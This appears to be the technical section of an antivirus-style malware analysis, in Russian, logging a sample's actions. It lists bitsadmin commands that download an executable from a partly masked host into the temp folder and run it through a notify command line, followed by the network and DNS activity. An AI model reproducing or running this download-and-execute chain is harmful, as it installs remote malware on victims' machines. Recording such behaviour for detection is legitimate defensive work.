Техническая информация
- '<SYSTEM32>\bitsadmin.exe' /reset
- '<SYSTEM32>\bitsadmin.exe' /create ""
- '<SYSTEM32>\bitsadmin.exe' /addfile "" "http://sp####1eaves.com/trade/wire/hustle/god/jeffffffffff.exe" "%TEMP%\tmpfile.exe"
- '<SYSTEM32>\bitsadmin.exe' /setproxysettings "" NO_PROXY
- '<SYSTEM32>\bitsadmin.exe' /setnotifyflags "" 1
- '<SYSTEM32>\bitsadmin.exe' /setnotifycmdline "" "<SYSTEM32>\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"%TEMP%\tmpfile.exe\""
- '<SYSTEM32>\bitsadmin.exe' /resume ""
- 'sp####1eaves.com':80
- DNS ASK sp####1eaves.com